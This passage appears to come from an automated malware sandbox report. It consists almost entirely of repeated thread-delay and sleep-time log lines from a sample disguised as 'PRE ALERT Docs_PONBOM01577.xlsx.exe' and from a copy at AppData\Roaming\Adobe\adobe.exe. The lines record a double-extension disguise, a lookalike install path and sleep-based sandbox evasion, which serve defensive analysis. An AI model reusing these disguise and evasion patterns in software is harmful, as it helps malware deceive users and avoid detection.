                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595952Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595731Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595624Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595395Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595280Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598369Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597782Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597657Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596704Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596454Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596079Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595954Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595704Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595454Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595079Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594954Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594704Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594454Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594079Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWindow / User API: threadDelayed 7032Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWindow / User API: threadDelayed 2793Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 4037Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 5815Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 7447Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 2375Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 6800Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep count: 39 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -599890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7300Thread sleep count: 7032 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7300Thread sleep count: 2793 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -599671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -599343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -599234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -599124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -599015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -598906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -598796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -598687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -598578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -598468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -598357s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -598124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -597796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -597482s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -597369s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -597242s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -597122s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -597015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -596906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -596796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -596687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -596577s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -596468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -596249s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -596139s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -596022s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -595921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -595812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -595700s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -595593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -595484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -595374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -595264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -595156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -595046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -594934s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -594823s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -594718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -594609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -594500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe TID: 7296Thread sleep time: -594390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7468Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -599890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7620Thread sleep count: 4037 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7620Thread sleep count: 5815 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -599671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -599343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -599234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -599120s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -599015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -598906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -598796s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -598687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -598578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -598463s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -598356s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -598250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -598029s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -597918s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -597812s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -597703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -597593s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -597484s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -597374s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -597265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -597156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -597044s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -596937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -596828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -596718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -596609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -596500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -596390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -596281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -596171s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -596062s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -595952s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -595843s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -595731s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -595624s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -595515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -595395s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -595280s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -595171s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -595062s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -594953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -594843s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -594625s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7608Thread sleep time: -594515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7800Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7944Thread sleep count: 7447 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7944Thread sleep count: 2375 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -599657s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -599532s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -599407s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -599297s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -599171s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -599063s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -598953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -598844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -598719s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -598610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -598485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -598369s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -598250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -598141s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -598016s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -597907s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -597782s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -597657s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -597547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -597438s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -597313s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -597188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -597063s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -596938s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -596829s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -596704s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -596579s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -596454s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -596329s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -596204s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -596079s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -595954s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -595829s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -595704s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -595579s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -595454s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -595329s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -595204s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -595079s >= -30000sJump to behavior
